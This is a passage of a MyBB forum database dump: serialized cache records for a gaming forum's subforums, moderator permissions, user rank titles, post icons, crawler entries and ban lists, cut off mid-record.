18:\"ForumsRequirements\";s:1:\"0\";}i:72;a:37:{s:3:\"fid\";s:2:\"72\";s:4:\"name\";s:8:\"Consoles\";s:11:\"description\";s:90:\"Discussions on famous gaming consoles such as Playstation 3 and Xbox should be held here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,72\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:26:\"DO NOT BUY NFS Most Wanted\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:11:\"console.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:73;a:37:{s:3:\"fid\";s:2:\"73\";s:4:\"name\";s:24:\"Mobile and Tablet Gaming\";s:11:\"description\";s:76:\"For those who have Kindles, IOS, Androids, and Tablet needs post them here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,73\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:28:\"Temple Run or Subway Surfer?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"ipad.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:74;a:37:{s:3:\"fid\";s:2:\"74\";s:4:\"name\";s:26:\"Online and Computer Gaming\";s:11:\"description\";s:100:\"Discuss your favorite games here. Topics include Counter Strike, Minecraft, Texas Hold\'em Poker etc.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,74\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"262\";s:15:\"lastpostsubject\";s:15:\"GEARS OF WAR :P\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:23:\"orange_folder_games.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:75;a:37:{s:3:\"fid\";s:2:\"75\";s:4:\"name\";s:29:\"Cheats, Walkthrough and Codes\";s:11:\"description\";s:93:\"Need cheats? Share your favorite codes, cheats and walkthroughs on your favorite games here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,75\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:25:\"Batman Arkham City Cheats\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:15:\"games_black.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:76;a:37:{s:3:\"fid\";s:2:\"76\";s:4:\"name\";s:13:\"Playstation 3\";s:11:\"description\";s:82:\"The top rated console for having the best graphic design and other cool features. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"72\";s:10:\"parentlist\";s:8:\"70,72,76\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"257\";s:15:\"lastpostsubject\";s:20:\"rage cheats and tips\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:31:\"playstation_3_standing_icon.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:77;a:37:{s:3:\"fid\";s:2:\"77\";s:4:\"name\";s:8:\"Xbox 360\";s:11:\"description\";s:158:\"The Xbox 360 is the second video game console developed by and produced for Microsoft and the successor to the Xbox also competes with the Sony\'s PS3 and Wii.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"72\";s:10:\"parentlist\";s:8:\"70,72,77\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"306\";s:15:\"lastpostsubject\";s:34:\"GamerTag Availability Checker Site\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"xbox_360.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}}'); INSERT INTO mybb_datacache VALUES('moderators', 'a:81:{i:0;i:0;i:1;s:0:\"\";i:3;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"4\";s:3:\"fid\";s:1:\"3\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:50;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"4\";s:3:\"fid\";s:1:\"3\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:49;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"4\";s:3:\"fid\";s:1:\"3\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:4;s:0:\"\";i:5;s:0:\"\";i:2;s:0:\"\";i:48;s:0:\"\";i:19;s:0:\"\";i:6;s:0:\"\";i:7;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"1\";s:3:\"fid\";s:1:\"7\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:56;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"1\";s:3:\"fid\";s:1:\"7\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:83;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"1\";s:3:\"fid\";s:1:\"7\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:42;s:0:\"\";i:47;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"6\";s:3:\"fid\";s:2:\"47\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:65;s:0:\"\";i:64;s:0:\"\";i:9;s:0:\"\";i:8;s:0:\"\";i:10;s:0:\"\";i:11;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"2\";s:3:\"fid\";s:2:\"11\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"0\";s:5:\"title\";s:10:\"Moderators\";}}}i:12;s:0:\"\";i:59;s:0:\"\";i:13;s:0:\"\";i:14;s:0:\"\";i:46;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"5\";s:3:\"fid\";s:2:\"46\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"0\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:15;s:0:\"\";i:20;s:0:\"\";i:21;s:0:\"\";i:16;s:0:\"\";i:17;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"3\";s:3:\"fid\";s:2:\"17\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:45;s:0:\"\";i:18;s:0:\"\";i:43;s:0:\"\";i:51;s:0:\"\";i:69;s:0:\"\";i:52;s:0:\"\";i:53;s:0:\"\";i:67;s:0:\"\";i:68;s:0:\"\";i:22;s:0:\"\";i:23;s:0:\"\";i:24;s:0:\"\";i:25;s:0:\"\";i:26;s:0:\"\";i:27;s:0:\"\";i:31;s:0:\"\";i:28;s:0:\"\";i:55;s:0:\"\";i:29;s:0:\"\";i:54;s:0:\"\";i:30;s:0:\"\";i:84;s:0:\"\";i:57;s:0:\"\";i:58;s:0:\"\";i:61;a:1:{s:5:\"users\";a:2:{i:82;a:14:{s:3:\"mid\";s:2:\"15\";s:3:\"fid\";s:2:\"61\";s:2:\"id\";s:2:\"82\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:7:\"iTzIpod\";s:9:\"usergroup\";s:1:\"9\";s:12:\"displaygroup\";s:2:\"13\";}i:62;a:14:{s:3:\"mid\";s:2:\"13\";s:3:\"fid\";s:2:\"61\";s:2:\"id\";s:2:\"62\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:19:\"R?????zo?\";s:9:\"usergroup\";s:1:\"9\";s:12:\"displaygroup\";s:2:\"13\";}}}i:66;a:1:{s:5:\"users\";a:1:{i:61;a:14:{s:3:\"mid\";s:2:\"10\";s:3:\"fid\";s:2:\"66\";s:2:\"id\";s:2:\"61\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:3:\"NXK\";s:9:\"usergroup\";s:1:\"4\";s:12:\"displaygroup\";s:1:\"0\";}}}i:79;a:1:{s:5:\"users\";a:1:{i:232;a:14:{s:3:\"mid\";s:2:\"11\";s:3:\"fid\";s:2:\"79\";s:2:\"id\";s:3:\"232\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:7:\"BreShiE\";s:9:\"usergroup\";s:1:\"2\";s:12:\"displaygroup\";s:2:\"12\";}}}i:81;a:1:{s:5:\"users\";a:1:{i:100;a:14:{s:3:\"mid\";s:2:\"14\";s:3:\"fid\";s:2:\"81\";s:2:\"id\";s:3:\"100\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:23:\"??zg???g????61\";s:9:\"usergroup\";s:1:\"9\";s:12:\"displaygroup\";s:2:\"20\";}}}i:82;a:1:{s:5:\"users\";a:1:{i:228;a:14:{s:3:\"mid\";s:2:\"16\";s:3:\"fid\";s:2:\"82\";s:2:\"id\";s:3:\"228\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:13:\"VirtualLegend\";s:9:\"usergroup\";s:1:\"6\";s:12:\"displaygroup\";s:1:\"6\";}}}i:70;s:0:\"\";i:71;s:0:\"\";i:72;s:0:\"\";i:76;s:0:\"\";i:77;s:0:\"\";i:73;s:0:\"\";i:74;s:0:\"\";i:75;s:0:\"\";i:32;s:0:\"\";i:33;s:0:\"\";i:34;s:0:\"\";i:63;s:0:\"\";i:44;s:0:\"\";i:35;s:0:\"\";i:36;s:0:\"\";i:37;s:0:\"\";i:38;s:0:\"\";i:39;s:0:\"\";i:40;s:0:\"\";i:41;s:0:\"\";}'); INSERT INTO mybb_datacache VALUES('usertitles', 'a:7:{i:0;a:5:{s:4:\"utid\";s:1:\"7\";s:5:\"posts\";s:5:\"10000\";s:5:\"title\";s:5:\"Sigma\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:16:\"{theme}/star.gif\";}i:1;a:5:{s:4:\"utid\";s:1:\"6\";s:5:\"posts\";s:4:\"5000\";s:5:\"title\";s:4:\"Zeta\";s:5:\"stars\";s:1:\"6\";s:9:\"starimage\";s:16:\"{theme}/star.gif\";}i:2;a:5:{s:4:\"utid\";s:1:\"5\";s:5:\"posts\";s:4:\"2500\";s:5:\"title\";s:7:\"Epsilon\";s:5:\"stars\";s:1:\"5\";s:9:\"starimage\";s:0:\"\";}i:3;a:5:{s:4:\"utid\";s:1:\"4\";s:5:\"posts\";s:4:\"1000\";s:5:\"title\";s:5:\"Delta\";s:5:\"stars\";s:1:\"4\";s:9:\"starimage\";s:0:\"\";}i:4;a:5:{s:4:\"utid\";s:1:\"3\";s:5:\"posts\";s:3:\"250\";s:5:\"title\";s:5:\"Gamma\";s:5:\"stars\";s:1:\"3\";s:9:\"starimage\";s:0:\"\";}i:5;a:5:{s:4:\"utid\";s:1:\"2\";s:5:\"posts\";s:2:\"50\";s:5:\"title\";s:4:\"Beta\";s:5:\"stars\";s:1:\"2\";s:9:\"starimage\";s:0:\"\";}i:6;a:5:{s:4:\"utid\";s:1:\"1\";s:5:\"posts\";s:1:\"0\";s:5:\"title\";s:5:\"Alpha\";s:5:\"stars\";s:1:\"1\";s:9:\"starimage\";s:0:\"\";}}'); INSERT INTO mybb_datacache VALUES('reportedposts', 'a:3:{s:6:\"unread\";s:1:\"0\";s:5:\"total\";s:2:\"57\";s:12:\"lastdateline\";N;}'); INSERT INTO mybb_datacache VALUES('mycode', 'a:1:{i:0;a:2:{s:5:\"regex\";s:28:\"\\[twitter\\](.*?)\\[/twitter\\]\";s:11:\"replacement\";s:350:\"Follow @$1\r\n\";}}'); INSERT INTO mybb_datacache VALUES('posticons', 'a:20:{i:1;a:3:{s:3:\"iid\";s:1:\"1\";s:4:\"name\";s:3:\"Bug\";s:4:\"path\";s:20:\"images/icons/bug.gif\";}i:2;a:3:{s:3:\"iid\";s:1:\"2\";s:4:\"name\";s:11:\"Exclamation\";s:4:\"path\";s:28:\"images/icons/exclamation.gif\";}i:3;a:3:{s:3:\"iid\";s:1:\"3\";s:4:\"name\";s:8:\"Question\";s:4:\"path\";s:25:\"images/icons/question.gif\";}i:4;a:3:{s:3:\"iid\";s:1:\"4\";s:4:\"name\";s:5:\"Smile\";s:4:\"path\";s:22:\"images/icons/smile.gif\";}i:5;a:3:{s:3:\"iid\";s:1:\"5\";s:4:\"name\";s:3:\"Sad\";s:4:\"path\";s:20:\"images/icons/sad.gif\";}i:6;a:3:{s:3:\"iid\";s:1:\"6\";s:4:\"name\";s:4:\"Wink\";s:4:\"path\";s:21:\"images/icons/wink.gif\";}i:7;a:3:{s:3:\"iid\";s:1:\"7\";s:4:\"name\";s:8:\"Big Grin\";s:4:\"path\";s:24:\"images/icons/biggrin.gif\";}i:8;a:3:{s:3:\"iid\";s:1:\"8\";s:4:\"name\";s:6:\"Tongue\";s:4:\"path\";s:23:\"images/icons/tongue.gif\";}i:9;a:3:{s:3:\"iid\";s:1:\"9\";s:4:\"name\";s:5:\"Brick\";s:4:\"path\";s:22:\"images/icons/brick.gif\";}i:10;a:3:{s:3:\"iid\";s:2:\"10\";s:4:\"name\";s:5:\"Heart\";s:4:\"path\";s:22:\"images/icons/heart.gif\";}i:11;a:3:{s:3:\"iid\";s:2:\"11\";s:4:\"name\";s:11:\"Information\";s:4:\"path\";s:28:\"images/icons/information.gif\";}i:12;a:3:{s:3:\"iid\";s:2:\"12\";s:4:\"name\";s:9:\"Lightbulb\";s:4:\"path\";s:26:\"images/icons/lightbulb.gif\";}i:13;a:3:{s:3:\"iid\";s:2:\"13\";s:4:\"name\";s:5:\"Music\";s:4:\"path\";s:22:\"images/icons/music.gif\";}i:14;a:3:{s:3:\"iid\";s:2:\"14\";s:4:\"name\";s:5:\"Photo\";s:4:\"path\";s:22:\"images/icons/photo.gif\";}i:15;a:3:{s:3:\"iid\";s:2:\"15\";s:4:\"name\";s:7:\"Rainbow\";s:4:\"path\";s:24:\"images/icons/rainbow.gif\";}i:16;a:3:{s:3:\"iid\";s:2:\"16\";s:4:\"name\";s:7:\"Shocked\";s:4:\"path\";s:24:\"images/icons/shocked.gif\";}i:17;a:3:{s:3:\"iid\";s:2:\"17\";s:4:\"name\";s:4:\"Star\";s:4:\"path\";s:21:\"images/icons/star.gif\";}i:18;a:3:{s:3:\"iid\";s:2:\"18\";s:4:\"name\";s:11:\"Thumbs Down\";s:4:\"path\";s:27:\"images/icons/thumbsdown.gif\";}i:19;a:3:{s:3:\"iid\";s:2:\"19\";s:4:\"name\";s:9:\"Thumbs Up\";s:4:\"path\";s:25:\"images/icons/thumbsup.gif\";}i:20;a:3:{s:3:\"iid\";s:2:\"20\";s:4:\"name\";s:5:\"Video\";s:4:\"path\";s:22:\"images/icons/video.gif\";}}'); INSERT INTO mybb_datacache VALUES('update_check', 'a:1:{s:10:\"last_check\";i:1351573645;}'); INSERT INTO mybb_datacache VALUES('tasks', 'a:1:{s:7:\"nextrun\";s:10:\"1352757300\";}'); INSERT INTO mybb_datacache VALUES('spiders', 'a:8:{i:16;a:4:{s:3:\"sid\";s:2:\"16\";s:4:\"name\";s:12:\"Google-Image\";s:9:\"useragent\";s:15:\"Googlebot-Image\";s:9:\"usergroup\";s:1:\"8\";}i:96;a:4:{s:3:\"sid\";s:2:\"96\";s:4:\"name\";s:12:\"Web Archive \";s:9:\"useragent\";s:15:\"archive.org_bot\";s:9:\"usergroup\";s:1:\"8\";}i:9;a:4:{s:3:\"sid\";s:1:\"9\";s:4:\"name\";s:5:\"Baidu\";s:9:\"useragent\";s:11:\"Baiduspider\";s:9:\"usergroup\";s:1:\"8\";}i:93;a:4:{s:3:\"sid\";s:2:\"93\";s:4:\"name\";s:11:\"DuckDuckBot\";s:9:\"useragent\";s:11:\"DuckDuckBot\";s:9:\"usergroup\";s:1:\"8\";}i:18;a:4:{s:3:\"sid\";s:2:\"18\";s:4:\"name\";s:14:\"Alexa Internet\";s:9:\"useragent\";s:11:\"ia_archiver\";s:9:\"usergroup\";s:1:\"8\";}i:1;a:4:{s:3:\"sid\";s:1:\"1\";s:4:\"name\";s:6:\"Google\";s:9:\"useragent\";s:9:\"Googlebot\";s:9:\"usergroup\";s:1:\"8\";}i:7;a:4:{s:3:\"sid\";s:1:\"7\";s:4:\"name\";s:4:\"Bing\";s:9:\"useragent\";s:6:\"msnbot\";s:9:\"usergroup\";s:1:\"8\";}i:8;a:4:{s:3:\"sid\";s:1:\"8\";s:4:\"name\";s:6:\"Yahoo!\";s:9:\"useragent\";s:5:\"Slurp\";s:9:\"usergroup\";s:1:\"8\";}}'); INSERT INTO mybb_datacache VALUES('bannedips', 'a:2:{i:82;a:2:{s:3:\"fid\";s:2:\"82\";s:6:\"filter\";s:13:\"97.255.20.208\";}i:88;a:2:{s:3:\"fid\";s:2:\"88\";s:6:\"filter\";s:12:\"71.67.179.16\";}}'); INSERT INTO mybb_datacache VALUES('banned', 'a:17:{i:108;a:10:{s:3:\"uid\";s:3:\"108\";s:3:\"gid\";s:2:\"14\";s:8:\"oldgroup\";s:1:\"5\";s:19:\"oldadditionalgroups\";s:0:\"\";s:15:\"olddisplaygroup\";s:1:\"0\";s:5:\"admin\";s:1:\"1\";s:8:\"dateline\";s:10:\"1346768917\";s:7:\"bantime\";s:3:\"---\";s:6:\"lifted\";s:1:\"0\";s:6:\"reason\";s:53:\"Multi Accounting (Proof: Time and gmx.com spam 